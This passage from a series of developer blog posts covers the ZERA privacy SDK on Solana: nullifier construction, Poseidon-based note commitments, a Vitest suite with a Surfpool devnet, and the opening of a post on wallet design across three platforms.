The reason this matters: in a transparent UTXO system (Bitcoin, original Solana SPL), the chain knows which UTXO got spent because it sees the input. In a shielded system, the chain doesn't know which note got spent — that's the whole point of the privacy layer — so we need a way for the chain to refuse double-spends *without learning the identity of the spent note*. Nullifiers are that way.

## The Zcash inheritance

This is not a ZERA invention. The nullifier construction goes back to Zcash Sprout (2016) and the Sapling upgrade (2018), and the [Zcash protocol specification](https://zips.z.cash/protocol/protocol.pdf) is still the canonical reference. In Sapling, the nullifier of a note is `PRF^nf(nk, ρ)` where `nk` is the spending key and `ρ` is a per-note nonce derived from the note's commitment. The construction has two essential properties:

1. **Deterministic given the secret material.** The same note always produces the same nullifier, so a second spend is detectable.
2. **Unlinkable without the secret material.** An observer who sees the commitment cannot derive the nullifier; only the owner of the spending key can.

ZERA's construction is the same idea, simplified for the deployment surface. Sapling has a richer key tree (`ask`/`nsk`/`nk`/`ovk`/`ivk`) because it ships viewing keys, expiry windows, and a separate proof-spend key. ZERA's MVP keeps the same roles inside one `secret` field per note. If the protocol grows a viewing-key abstraction (and it will — see the wallet's HKDF-derived viewing keys in [the v3 wallet post](/blog/zera_wallet_v3_zkp/)), the nullifier construction can absorb that without breaking, because the input set is `Poseidon(secret, commitment)` and `secret` is the part that gets specialised.

## The six lines of TypeScript

Open [`packages/sdk/src/note.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.ts) in the SDK and search for `computeNullifier`. The whole function is:

```ts
/**
 * Compute the nullifier for spending a note.
 *
 * ```
 * nullifier = Poseidon(secret, commitment)
 * ```
 */
export async function computeNullifier(
  secret: bigint,
  commitment: bigint,
): Promise<bigint> {
  return poseidonHash([secret, commitment]);
}
```

That's it. Two field elements in, one field element out, one Poseidon call in the middle. The accompanying tests in [`note.test.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.test.ts) are equally bare:

```ts
describe("computeNullifier", () => {
  it("returns a deterministic bigint", async () => {
    const note = createNote(100n, 1n);
    const commitment = await computeCommitment(note);
    const a = await computeNullifier(note.secret, commitment);
    const b = await computeNullifier(note.secret, commitment);
    expect(a).toBe(b);
  });

  it("different secrets produce different nullifiers", async () => {
    const note1 = createNote(100n, 1n);
    const note2 = createNote(100n, 1n);
    const commitment = await computeCommitment(note1);
    const n1 = await computeNullifier(note1.secret, commitment);
    const n2 = await computeNullifier(note2.secret, commitment);
    expect(n1).not.toBe(n2);
  });
});
```

The first test asserts determinism — same inputs, same output, every time. The second asserts independence — two notes with the same `(amount, asset)` but different secrets must produce different nullifiers, otherwise the privacy property collapses.

The Rust mirror lives at [`crates/zera-core/src/note.rs`](https://github.com/Dax911/zera-sdk/blob/main/crates/zera-core/src/note.rs) — same shape, same Poseidon, same input order. The whole point of having two implementations under one cross-validated test vector ([see the cryptography doc](https://github.com/Dax911/zera-sdk/blob/main/docs/CRYPTOGRAPHY.md)) is that the host language never matters. JS in the wallet, Rust in the on-chain program, Rust-via-Neon in Node consumers — all four pipelines have to agree on the byte representation of `Poseidon(secret, commitment)`. They do, because the test vectors say so on every CI run.

## Why `secret` and `blinding` are different fields

The note struct from [`note.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.ts) has two random fields:

```ts
return {
  amount,
  asset,
  secret: randomFieldElement(),
  blinding: randomFieldElement(),
  memo: memo ?? [0n, 0n, 0n, 0n],
};
```

I noted this in [the Pedersen post](/blog/pedersen_commitments_in_production/) but it's worth restating in nullifier-context: the `secret` is what the nullifier depends on. The `blinding` is what gives the *commitment* its hiding property. They are separated because they fail differently.

If `blinding` leaks (say, via a buggy memo encryption scheme), the worst case is the commitment becomes enumerable for small `amount` spaces. Bad, recoverable.

If `secret` leaks, the nullifier becomes predictable, which means an attacker can stamp the chain with the nullifier *before* the legitimate owner does, and the legitimate spend gets rejected as a double-spend. This is the worst possible failure mode in a privacy pool. The note becomes unspendable.

Sampling them as independent 248-bit field elements means an attacker who compromises one does not get the other for free. The cost is ~62 bytes of additional state per note. The benefit is decorrelating the two failure modes that would otherwise chain.

## The lifecycle, in one diagram

```
1.  CREATE  (off-chain)
    note = createNote(amount, asset)
        ├── secret    = randomFieldElement()   // private, kept by owner
        └── blinding  = randomFieldElement()   // private, kept by owner

2.  COMMIT  (on-chain, via deposit or transfer-output)
    commitment = Poseidon(amount, secret, blinding, asset, memo[0..3])
    --> commitment is appended to the on-chain Merkle tree at leafIndex

3.  HOLD    (off-chain, in the wallet)
    Owner stores { note, commitment, leafIndex, nullifier? } locally.
    Nullifier may be precomputed but is NOT yet on-chain.

4.  SPEND   (on-chain, via withdraw or transfer-input)
    nullifier = Poseidon(secret, commitment)
    proof     = Groth16(
                  public:  nullifier, root, recipientHash, amount, asset
                  private: secret, blinding, memo, leafIndex, merkle_path
                )
    --> on-chain program checks:
        a. proof verifies under verifying_key
        b. nullifier_pda(nullifier) does not yet exist
        c. root matches a recent on-chain root
    --> if all pass, program creates nullifier_pda(nullifier).

5.  REJECT  (any future spend attempt with the same nullifier)
    nullifier_pda(nullifier) exists --> program returns
    "DoubleSpendDetected" without ever learning which note it was.
```

The reject step is the magic. The on-chain program does not know which note is being respent. It does not know which leaf in the Merkle tree the nullifier corresponds to. It only knows that a PDA seeded by the nullifier hash already exists, and it refuses to recreate it. From [`packages/sdk/src/pda.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/pda.ts), the seed shape is `["nullifier", nullifierBytes32]`:

```ts
export const NULLIFIER_SEED = "nullifier";
```

Each nullifier on the chain is a 32-byte BN254 field element packed into a PDA. PDAs are cheap on Solana, but they are not free, and the rent-exempt minimum balance for a tiny PDA is the actual cost of "stamping the chain with a nullifier." It is sub-cent on devnet and mainnet alike. That is the cost of double-spend protection in this design.

## What the circuit actually proves

The transfer circuit (one-input, two-output) and the withdraw circuit (one-input, one-recipient-hash) both compute the nullifier *inside the circuit* from the witness and assert equality with the public input. From [`packages/sdk/src/prover.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/prover.ts):

```ts
const input = {
  // Public
  root: tree.root.toString(),
  nullifierHash: nullifierHash.toString(),
  recipient: recipientHash.toString(),
  amount: note.amount.toString(),
  asset: note.asset.toString(),
  // Private
  secret: note.secret.toString(),
  // ...
};
```

The circuit's predicate, in pseudocode:

```
1. computed_commitment   = Poseidon(amount, secret, blinding, asset, memo[0..3])
2. computed_nullifier    = Poseidon(secret, computed_commitment)
3. assert  computed_nullifier == nullifierHash         (public input)
4. assert  Merkle(root, leafIndex, path) == computed_commitment
5. assert  amount, asset bind to public inputs
```

That's the whole privacy proof. The chain learns the nullifier and the new output commitments. It does not learn the amount inside, the asset, the original commitment, or the leaf index. The nullifier is the only piece of identifying information leaked, and the only thing it identifies is *itself* — there is no on-chain link from nullifier back to commitment without breaking the hash.

This is also why the `secret`-as-witness matters. If the nullifier could be derived from public information alone, anyone could replay it. The privacy story collapses. Because the secret is sampled per-note and is part of both the commitment witness and the nullifier preimage, only the holder of the secret can produce the proof. That binding is what stops one user from frontrunning another's spend.

## What an attack looks like, briefly

There are exactly two things an attacker can try, and they both lose.

**Attack 1: precompute someone's nullifier and stamp the chain first.** Requires `secret`. Without it, you can't compute `Poseidon(secret, commitment)`. The note's `secret` is sampled with 248 bits of CSPRNG entropy and reduced mod the BN254 prime, so brute-force is not on the table. Mitigation: the keystore in [the wallet](/blog/zera_wallet_v3_zkp/) keeps the secret in Rust, behind a ChaCha20-Poly1305 layer derived from an Argon2id-hardened password, and never lets it touch JavaScript.

**Attack 2: replay a nullifier from a previous valid spend.** This is the "spam the chain with old nullifiers" attack. It loses immediately because the on-chain program checks for PDA existence on every spend, and an existing PDA is exactly the signal "this nullifier has been seen before, reject." There is no clever ordering that gets around this — the PDA is monotonically created.

The thing that's not in the threat model: a global attacker who can correlate metadata about *when* spends happen. That's a network-layer problem, not a cryptographic one. Tor-style mixing, relayer rotation, and the [voucher / private-cash](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/voucher.ts) flow are all the answer to that, and they are deliberately layered on top of the nullifier system rather than baked into it.

## Why this matters for the marketing pillar

[zeralabs.org](https://zeralabs.org) ships "Anti-Double Spending" as one of its six pillars, alongside True Offline Payments, Cryptographic Privacy, Perfect Divisibility, Secure Enclaves, and Solana Speed. Anti-Double Spending and Cryptographic Privacy *both* live or die on this construction. The pillar is real because the construction is real. It is not a stitched-together promise that turns into a complicated multi-party signing scheme later. It is one Poseidon hash and one PDA, and it has been the right answer since 2016.

The boring answer is the right answer. The marketing word is "Nullifier Generation." The implementation is six lines. The reason it sits next to Pedersen Commitments on the front page is that without it, the privacy pool is just a private deposit box you can drain twice.

## Further reading

- [zeralabs.org](https://zeralabs.org) — the "Cryptographic Innovations" section names this construction.
- [`packages/sdk/src/note.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.ts) — `computeNullifier` and friends.
- [`packages/sdk/src/note.test.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/note.test.ts) — the determinism and independence tests.
- [`packages/sdk/src/prover.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/prover.ts) — where the nullifier becomes a public input.
- [`packages/sdk/src/pda.ts`](https://github.com/Dax911/zera-sdk/blob/main/packages/sdk/src/pda.ts) — the `NULLIFIER_SEED` constant and PDA derivation.
- [Zcash Protocol Specification](https://zips.z.cash/protocol/protocol.pdf) — the prior art this construction is descended from.
- [Pedersen commitments, in production](/blog/pedersen_commitments_in_production/) — the sibling-cryptography post.
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — where these primitives first landed in the SDK monorepo.
- [Why I started Zera Labs](/blog/why_i_started_zera_labs/) — the founding letter that sets up why these primitives are the line where ZK leaves the lab.


---

# Pedersen commitments, in production

Canonical: https://blog.skill-issue.dev/blog/pedersen_commitments_in_production/
Description: ZERA marketing says "Pedersen Commitments" on the cryptography page. The SDK ships Poseidon. Both are right — and the gap between them is the whole story of what shipping ZK in 2026 actually looks like.
Published: 2026-04-01T20:36:33.000Z
Tags: zera, cryptography, pedersen, poseidon, bn254, rust, zk


The [ZERA Labs site](https://zeralabs.org) lists three "Cryptographic Innovations" on the front page: **Pedersen Commitments, Zero-Knowledge Proofs, Nullifier Generation.** If you read the SDK, you will not find a function called `pedersenCommit`. You will find `computeCommitment` and behind it a Poseidon hash. The first time someone asked me to reconcile the two, I gave a bad answer. This post is the answer I should have given.

A Pedersen commitment, in the textbook sense, is `C = a·G + b·H` where `G` and `H` are independent elliptic-curve generators, `a` is the value, and `b` is the blinding factor. The construction is **homomorphic** (you can add commitments and you add their values) and **perfectly hiding under the discrete-log assumption** (without the blinding factor, the commitment leaks zero information about the value). Bitcoin's Confidential Transactions used Pedersen commitments. So did the original Zcash Sprout for note values. They are the canonical "I'm hiding a number" primitive in ZK literature.

What ZERA ships is not that. What ZERA ships is a **Poseidon-based commitment** — a hash-based commitment that hides the same set of fields (`amount, asset, secret, blinding, memo[0..3]`) and is binding under the collision-resistance of Poseidon. The marketing copy keeps the word "Pedersen" because that's the term-of-art for the *role* — a hiding, binding commitment to a confidential note. The implementation is the right primitive for the deployment target, which is Solana, which has a `sol_poseidon` syscall, which means Poseidon costs us a few thousand compute units and Pedersen would cost us hundreds of thousands.

This post walks the why, the what, and the receipts.

## What we actually wanted from "Pedersen"

Strip the construction down to the requirement. A note commitment in a shielded pool has to be:

1. **Hiding.** Given the on-chain commitment, no observer can recover the amount, secret, blinding, asset, or memo.
2. **Binding.** Once posted, the depositor cannot later "open" the commitment to a different note.
3. **Cheap inside a circuit.** The prover needs to recompute the commitment from the private inputs and assert equality with the public input. Every constraint there shows up in proving time and `.zkey` size.
4. **Cheap on-chain.** The settlement layer recomputes hashes whenever the Merkle tree advances. If that primitive is expensive, every deposit is expensive.

Pedersen on `bn254` G1 nails (1) and (2) but blows (3) and (4). Each scalar multiplication inside a Groth16 circuit is hundreds of constraints. On-chain, you'd be paying for elliptic-curve group ops on every leaf hash. Solana's compute-unit budget is generous but not infinite, and the on-chain Merkle tree is the hottest piece of state in the protocol.

Poseidon flips that. It's a permutation-based hash specifically designed for ZK circuits — `x^5` S-boxes, eight full rounds, partial rounds chosen for the field. The 2-to-1 variant we use for Merkle nodes costs us *dozens* of constraints, not hundreds. And on-chain, Solana provides it as a syscall that sips compute units. The hiding/binding properties come from collision-resistance of the hash and the fresh random `blinding` factor on every note.

So the engineering choice was: keep the *role* of a Pedersen commitment, swap the *primitive* for one that fits the deployment surface. Cypherpunk purity loses to compute units every time.

## The Rust core that everything else has to agree with

The canonical implementation lives in [`crates/zera-core/src/note.rs`](https://github.com/Dax911/zera-sdk/blob/main/crates/zera-core/src/note.rs). The crate documentation is intentionally clinical:

```rust
//! Note primitives for the ZERA shielded pool.
//!
//! A **Note** represents a confidential UTXO inside the pool. It carries an
//! amount, asset identifier, a secret (private key material), a blinding
//! factor, and an optional 4-element memo field.
//!
//! The note commitment is computed as:
//!
//!     commitment = Poseidon(amount, asset, secret, blinding, memo[0..3])
//!
//! The nullifier is:
//!
//!     nullifier = Poseidon(secret, commitment)
```

The shape of the `Note` struct enforces the contract:

```rust
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize, BorshSerialize, BorshDeserialize)]
pub struct Note {
    /// Token amount in the smallest denomination (e.g. USDC lamports).
    pub amount: u64,
    /// Asset identifier — typically `pubkey_to_field_bytes(mint.to_bytes())`.
    pub asset: [u8; 32],
    /// Secret key material (random 32 bytes). **Must be kept private.**
    pub secret: [u8; 32],
    /// Blinding factor for the Pedersen-like commitment (random 32 bytes).
    pub blinding: [u8; 32],
    /// Optional 4-element memo field (each element 32 bytes).
    pub memo: [[u8; 32]; 4],
}
```

Two things to notice. First, the doc comment for `blinding` literally says *"Pedersen-like."* That's the gap I described in the intro, written into the source for anyone who knows enough to look. Second, the secret and the blinding are sampled separately. They serve different roles: `secret` derives the nullifier, `blinding` derives the hiding property. If they were the same value, an attacker who learned the nullifier preimage would also unmask the amount. Sampling them independently is the cheap way to keep those failure modes from chaining.

The compute function:

```rust
pub fn compute_commitment(note: &Note) -> Result<[u8; 32]> {
    let amount_fr   = Fr::from(note.amount);
    let asset_fr    = Fr::from_be_bytes_mod_order(&note.asset);
    let secret_fr   = Fr::from_be_bytes_mod_order(&note.secret);
    let blinding_fr = Fr::from_be_bytes_mod_order(&note.blinding);
    let memo0_fr    = Fr::from_be_bytes_mod_order(&note.memo[0]);
    let memo1_fr    = Fr::from_be_bytes_mod_order(&note.memo[1]);
    let memo2_fr    = Fr::from_be_bytes_mod_order(&note.memo[2]);
    let memo3_fr    = Fr::from_be_bytes_mod_order(&note.memo[3]);

    let inputs = [
        amount_fr, asset_fr, secret_fr, blinding_fr,
        memo0_fr, memo1_fr, memo2_fr, memo3_fr,
    ];

    let h = poseidon_hash(&inputs)?;
    Ok(field_to_bytes32_be(&h))
}
```

That is the entire commitment. Eight field elements, one Poseidon, 32 bytes out. The `Fr::from_be_bytes_mod_order` is the unglamorous load-bearing call — it reduces a 32-byte big-endian array into the BN254 scalar field by modular reduction, which is the only way to ensure the JavaScript SDK and the Rust crate agree on the byte representation of a value that might exceed the field. The Solana on-chain program does the same thing in the same direction. Get the endianness wrong and your prover and your verifier disagree silently, which is the kind of bug that costs an audit cycle.

## Why three implementations of the same hash exist

If you grep the SDK, you find Poseidon implemented (or wrapped) four times:

- `crates/zera-core/src/poseidon.rs` — Rust, via [`light-poseidon`](https://crates.io/crates/light-poseidon) `new_circom`.
- `packages/sdk/src/crypto/poseidon.ts` — TypeScript, via `circomlibjs`.
- `crates/zera-neon/` — Neon binding so Node can call the Rust core.
- The on-chain program — Solana's `sol_poseidon` syscall.

That's four entry points to the same hash function, and they all have to produce the same 32 bytes for the same inputs or the protocol falls over. The reason for the proliferation is platform: snarkjs in the browser wants a JS hash, the on-chain program wants a syscall, the Rust core wants no JS dependencies, and Node consumers benefit from native performance. The SDK's `docs/CRYPTOGRAPHY.md` enumerates the cross-validation:

> All four are verified to produce the same output for known test vectors:
>
> ```
> Poseidon(0, 0) = 14744269619966411208579211824598458697587494354926760081771325075741142829156
> Poseidon(1, 2) = 7853200120776062878684798364095072458815029376092732009249414926327459813530
> ```

Those two test vectors are the cheapest possible smoke test that the four implementations agree at the byte level. They are run in CI on every commit. If any of them drift — different parameter set, different endianness, different round constants — the Vitest run goes red instantly and we don't ship.

## The hiding argument, written out once

The reason a hash with a fresh random blinding factor is hiding has nothing to do with Poseidon being magical. It's the same argument that justifies any hash-based commitment. Given `H(amount, asset, secret, blinding, memo)` and the value `amount`, the attacker has to find `(secret', blinding', memo')` such that `H(amount, asset, secret', blinding', memo') == commitment`. Because Poseidon is collision-resistant and the input space of `(secret, blinding)` is `2^254 × 2^254`, this is computationally infeasible. Without `blinding`, the commitment would be enumerable for small amount spaces — an attacker could precompute `H(0, asset, ...)`, `H(1, asset, ...)`, etc. With it, the precomputation is impossible.

The binding argument is the dual: to "open" the commitment to a different `amount'`, the attacker has to find a Poseidon collision. This reduces to the same hardness assumption.

This is the same contract the textbook Pedersen commitment provides, with a different cryptographic primitive backing it. The marketing word "Pedersen" is therefore not wrong, just collapsed. The role is identical. The construction is platform-appropriate.

## What Poseidon costs us

Poseidon is younger than SHA-256 and has received less cryptanalytic attention. The SDK's [SECURITY.md](https://github.com/Dax911/zera-sdk/blob/main/docs/SECURITY.md) is honest about this:

> Poseidon has been analyzed extensively in the academic literature. No practical attacks are known for the parameter sets used by circomlib. However, Poseidon is relatively new compared to SHA-256 and has received less cryptanalytic attention.

That's the right tone. The construction is sound, the parameter set is the one the entire ZK ecosystem uses, and the cryptanalysis pipeline is active and global. But Poseidon is a hash function in motion, and we should expect adjustments — Reinforced Concrete, Rescue, the next variant — to land over the next few years. The SDK is structured so the hash function is a single Rust module and a single TypeScript module. If we ever have to migrate, it's a contained change with a clear cross-validation surface.

The other thing Poseidon costs us, less obvious: it removes the homomorphic property of textbook Pedersen. You cannot add two Poseidon commitments and get a commitment to the sum. That property is what made Pedersen useful for *aggregate* confidential transactions in older protocols. ZERA does not need it, because the value-conservation check is enforced *inside the transfer circuit* (`inAmount == outAmount1 + outAmount2`), not by adding commitments outside the circuit. Different design point, different primitive.

## Why this matters for what ZERA is

If you read the [Why I started Zera Labs](/blog/why_i_started_zera_labs/) letter, the founding bet is that ZK is finally fast enough, cheap enough, and verifiable enough to leave the laboratory. The "cheap enough" leg is exactly the trade-off this post describes. We do not get to ship a privacy pool to mainstream users at 1¢ per transfer if we spend 200,000 compute units per Merkle node hash. Poseidon is the engineering choice that turns ZK from a research demo into a checkout button.

The ZERA Labs front page says "Pedersen Commitments" because the audience is people who want to know we have hiding/binding commitments to confidential notes. The SDK ships Poseidon because that's the implementation that makes the commitment cheap. Both are true, and the gap between them is the part of the work nobody sees.

## Further reading

- [zeralabs.org](https://zeralabs.org) — Cryptographic Innovation pillar (Pedersen Commitments / Zero-Knowledge Proofs / Nullifier Generation).
- [zera-sdk `crates/zera-core/src/note.rs`](https://github.com/Dax911/zera-sdk/blob/main/crates/zera-core/src/note.rs) — the canonical Rust implementation.
- [zera-sdk `docs/CRYPTOGRAPHY.md`](https://github.com/Dax911/zera-sdk/blob/main/docs/CRYPTOGRAPHY.md) — the cross-implementation invariant spec.
- [zera-sdk `docs/SECURITY.md`](https://github.com/Dax911/zera-sdk/blob/main/docs/SECURITY.md) — threat model + cryptographic assumptions.
- [light-poseidon crate](https://crates.io/crates/light-poseidon) — Rust implementation we depend on.
- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — where the four-implementation invariant first landed.
- [Why I started Zera Labs](/blog/why_i_started_zera_labs/) — the "fast enough, cheap enough" thesis.
- [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the privacy thesis these primitives implement.


---

# 144 Tests and a Surfpool Devnet

Canonical: https://blog.skill-issue.dev/blog/zera_sdk_test_suite/
Description: How the Zera SDK got from "scaffolded" to "trustable" — a 144-test Vitest suite, a Surfpool-forked devnet running on a Latitude box, and a quickstart that actually works.
Published: 2026-03-31T14:40:54.000Z
Tags: zera, typescript, testing, vitest, sdk, devnet, surfpool, solana


> "add comprehensive test suite for sdk (144 tests)"

That's [`80927`](https://github.com/Dax911/zera-sdk/commit/809274f5d2f8d3708cb09f6a353fec889994d59c), 2026-03-31. Three weeks after [the day-one scaffolding](/blog/zera_sdk_scaffolding/) shipped, the Zera SDK had 13 test files and 144 individual test cases, all passing under Vitest. Twenty-four hours after that, [`e350707`](https://github.com/Dax911/zera-sdk/commit/e350707ba47247f1ec1feac439267d11848bfde6) added a working hosted devnet, a quickstart guide, and the first end-to-end demo.

This post is about the bridge between "the code exists" and "you can use it without reading the source."

## The shape of the test suite

The 13 test files mirror the SDK's 13 modules:

```
constants.test.ts           crypto/keccak.test.ts
crypto/poseidon.test.ts     merkle-tree.test.ts
note-store.test.ts          note.test.ts
pda.test.ts                 prover.test.ts
tx/deposit.test.ts          tx/transfer.test.ts
tx/withdraw.test.ts         utils.test.ts
voucher.test.ts
```

The reason there's exactly one test file per source file: it's the easiest possible discipline to enforce. Open `note.ts`, see `note.test.ts`, expect coverage. Open `prover.ts`, see `prover.test.ts`, expect coverage. The moment you start putting "shared utility tests" in `helpers.test.ts`, you lose the ability to look at a file and know whether it's tested.

## A test that catches a regression I couldn't have predicted

From [`merkle-tree.test.ts`](https://github.com/Dax911/zera-sdk/blob/809274f5d2f8d3708cb09f6a353fec889994d59c/packages/sdk/src/merkle-tree.test.ts):

```ts
describe("MerkleTree", () => {
  it("initializes empty hashes correctly", async () => {
    const tree = await MerkleTree.create(SMALL_HEIGHT);
    // emptyHashes[0] should be 0 (empty leaf)
    expect(tree.emptyHashes[0]).toBe(0n);
    // emptyHashes[1] should be hash(0, 0)
    const expected1 = await poseidonHash2(0n, 0n);
    expect(tree.emptyHashes[1]).toBe(expected1);
  });

  it("root of empty tree matches the top-level empty hash", async () => {
    const tree = await MerkleTree.create(SMALL_HEIGHT);
    let expected = 0n;
    for (let i = 0; i < SMALL_HEIGHT; i++) {
      expected = await poseidonHash2(expected, expected);
    }
    expect(tree.getRoot()).toBe(expected);
  });
});
```

The "empty hashes" test is the one I'm proudest of. The empty-tree root is one of the most important invariants in a privacy pool: every fresh pool starts with this value, and the on-chain program initializes its tree to this value. If the off-chain SDK and the on-chain program disagree by a single bit, the very first deposit fails because the witness path doesn't reconcile to the root the program wrote at init.

Without this test, that bug shows up the first time a real user tries to deposit. With this test, it shows up in CI in 220ms.

## Test height ≠ production height

Note the constant at the top of the same file:

```ts
const SMALL_HEIGHT = 4;
```

The production `TREE_HEIGHT = 24`. Building a tree of height 24 in tests is doable but slow — Poseidon over 16M empty-hash slots means tens of seconds per test. Height 4 is 16 leaves. The properties under test (root recomputation, leaf indexing, witness path consistency) are agnostic to height. Test the small case in milliseconds, trust the algebra to scale.

## Devnet via Surfpool

The next major commit is [`e350707`](https://github.com/Dax911/zera-sdk/commit/e350707ba47247f1ec1feac439267d11848bfde6) on 2026-04-01: **`add devnet infrastructure, quickstart guide, and fix shielded pool program ID`**. This is the commit where I stopped saying "tests pass" and started saying "you can run this."

The devnet is a Surfpool-forked mainnet — a 1:1 fork of Solana mainnet state with Light Protocol ZK Compression and the Zera shielded pool program deployed on top. From [`devnet/SETUP.md`](https://github.com/Dax911/zera-sdk/blob/e350707ba47247f1ec1feac439267d11848bfde6/devnet/SETUP.md):

| Service | URL | Description |
|---------|-----|-------------|
| Solana RPC | `http://64.34.82.145:18899` | JSON-RPC (forked from mainnet) |
| WebSocket | `ws://64.34.82.145:18900` | Real-time subscriptions |
| Surfpool Studio | `http://64.34.82.145` | Dashboard UI (basic auth) |

Why Surfpool over `solana-test-validator`? Two reasons:

1. **It forks mainnet state.** The shielded pool needs to interact with real USDC and SPL token mints. A vanilla test-validator would have me re-creating those by hand. Surfpool just snapshots them.
2. **Light Protocol's whole stack is already deployed on mainnet.** Forking gives me the real programs at the real addresses, not stubs.

A Latitude box hosts the public devnet 24/7. Local devnets work too:

```bash
cd devnet
surfpool start --manifest-file-path ./txtx.yml \
  --rpc-url "https://api.mainnet-beta.solana.com"
```

`txtx.yml` contains the deploy runbooks. `accounts_dump/zera_pool.json` and `zera_pool.so` are the snapshot of the on-chain pool program's state. The whole devnet boots in under 30 seconds on a fresh box.

## The bug the devnet caught

The same commit message says **"fix shielded pool program ID."** That bug is the entire reason this commit exists. The SDK's `SHIELDED_POOL_PROGRAM_ID` constant in `constants.ts` was wrong — it pointed at a stale program ID from an early devnet deploy. Every transaction the SDK built was sent to a program that didn't exist anywhere. Tests pass because tests use mocked PDAs. Devnet caught it the moment a real `buildDepositTransaction` got submitted.

This is the point of having a devnet at all. Unit tests will tell you that your math is consistent. They will not tell you that your program ID is wrong. Only an end-to-end submission against a real cluster catches that.

## What this taught me

The test-to-deploy gap is the most expensive interval in any SDK's lifecycle. You can have 144 passing tests and still ship a constant pointing at the wrong program. The fix is not "more unit tests." The fix is one end-to-end test that submits a real transaction to a real cluster and asserts on the response. Surfpool made that possible without a public faucet, without a public RPC, without leaking devnet state to the world.

The other thing this taught me: a 144-test suite for a ~3000-line SDK is roughly the right ratio. Less and you can't refactor with confidence. Much more and you're testing the language. Vitest's parallel runner means the whole suite finishes in ~2 seconds locally; CI runs it on every PR and the latency cost of a regression stays close to zero.

## Trade-offs

**Why Vitest over Jest?** Native ESM, Vite-aligned config, faster start time. Jest's ESM story has improved but it still feels like a port. Vitest is the default if your project is already in the Vite/Bun half of the ecosystem.

**Why ship a hosted devnet at all?** Because partners and collaborators are not going to install Surfpool on day one. Giving them an HTTP endpoint that's already up is the difference between "I'll try it next week" and "I'm trying it right now."

**Why basic auth on the Studio dashboard?** Because it's a debug UI, not a public service, and exposing the validator state to anonymous internet traffic is a slow rug.

## Further reading

- [The 144-test commit](https://github.com/Dax911/zera-sdk/commit/809274f5d2f8d3708cb09f6a353fec889994d59c)
- [Devnet + quickstart commit](https://github.com/Dax911/zera-sdk/commit/e350707ba47247f1ec1feac439267d11848bfde6)
- [Surfpool documentation](https://surfpool.run)
- [Vitest](https://vitest.dev/)
- [Day-one SDK scaffolding](/blog/zera_sdk_scaffolding/) — what these tests are testing.


---

# Building the ZERA Wallet for desktop, iOS, and Android

Canonical: https://blog.skill-issue.dev/blog/zera_wallet_three_platforms/
Description: Three platforms, one shielded pool, one design system. The trade-offs of building a wallet that has to feel like cash on a phone, like a tool on a laptop, and the same on both.
Published: 2026-03-25T05:13:33.000Z
Tags: zera, wallet, react, typescript, mobile, ux


Most wallet posts start with the cryptography. This one starts with the part that is harder.

The cryptography is solved. We have [Pedersen commitments](/blog/pedersen_commitments_in_production/), [nullifiers](/blog/nullifiers_without_witchcraft/), Groth16 proofs that run in human-tolerable time, and a [SDK with the right asymmetric MCP surface](/blog/mcp_server_inside_zera_sdk/). The hard problem is the one that does not appear in any cryptography paper: **how do you make a wallet that feels like cash on a phone, like a tool on a laptop, and the same product on both?**

This is the part of [Zera Wallet](https://wallet.zeralabs.org) that nobody quotes the marketing copy of. It is also the part that takes the most code.

## Three platforms is two too many — except it isn't

The temptation when you launch a wallet in 2026 is to ship "mobile first" and let the desktop experience be a responsive cousin. There is a real argument for this: the median crypto user holds their assets on a phone, the offline-P2P story is a phone story (you tap two phones, you don't tap two laptops), and the mobile design constraints force discipline.

We almost did that. The reason we didn't is the user we kept seeing in customer development: the *operator.*

Operators are the people who run the treasury for a Zera-using business, who hold the cold-storage keys, who reconcile the books at end-of-quarter. They live on laptops. They want a wallet that gives them dense information — a real table of unspent notes, sortable, filterable, exportable to CSV. They are not an edge case; they are the customer who pays.

So we ended up with the same product on three platforms with deliberately different information density:

- **Mobile** — single-task, gesture-driven, big tap targets, NFC pairing for offline P2P, Face ID / biometrics gate on every send.
- **Desktop** — multi-pane, keyboard-first, dense tables, hardware-key signing, multi-account view, CSV export.
- **iOS / Android** — same Mobile UX, native share sheets, native NFC stack, platform-specific Secure Enclave integration.

The thing that makes this tractable is that the *primitives* underneath are identical. Same shielded pool. Same SDK. Same Merkle tree. The wallet is just three different lenses over the same state.

## The reference UX lives in `zera-wallet-demo`

Before the production wallet got a single line of code, the [`zera-wallet-demo`](https://github.com/Dax911/zera-wallet-demo) repo was running. It was — and still is — the canonical reference for what the wallet should *feel* like. From [the v3 ZKP commit log](/blog/zera_wallet_v3_zkp/) it is clear we iterated on the mental model in the demo dozens of times before committing to the production shape.

The demo's package.json is a fair list of the bets we made:

```json
"dependencies": {
  "@solana/wallet-adapter-react": "^0.15.35",
  "@solana/wallet-adapter-react-ui": "^0.9.35",
  "@solana/web3.js": "^1.98.0",
  "framer-motion": "^11.11.17",
  "lucide-react": "^0.468.0",
  "react": "^19.0.0",
  "react-router-dom": "^7.1.0",
  "sonner": "^1.7.1",
  "tailwind-merge": "^2.6.0",
  "zeraswap-sdk": "workspace:*"
}
```

A few of those choices deserve specific defence.

### React 19 was not the easy call

React 19 was barely a year old when we started, and the wallet ecosystem on Solana is full of libraries that were tested against React 17 and 18 and quietly assume hooks behave a specific way. We took the upgrade hit because the Server Components story changes how we think about *this is sensitive data, do not render it client-side* — even though we mostly use it from the client side, the discipline of marking which components touch keys and which do not made the security model cleaner.

### `framer-motion` for trust signals

You do not normally find a high-end animation library in a wallet codebase. We use it for one specific thing: the "send confirmed" state.

The transition between *"you have authorised this send"* and *"this send is final on chain"* is a moment of maximum user anxiety. A jarring instant flip from a button to a checkmark looks like the app glitched. A 350ms eased fade-in with the prior state visible underneath, settling into a green check, looks like the app is doing something. The animation is the *trust signal.* `framer-motion` makes that easy to ship and impossible to do badly.

We honour `prefers-reduced-motion` everywhere. The animation is decoration, not load-bearing.

### `sonner` for toasts

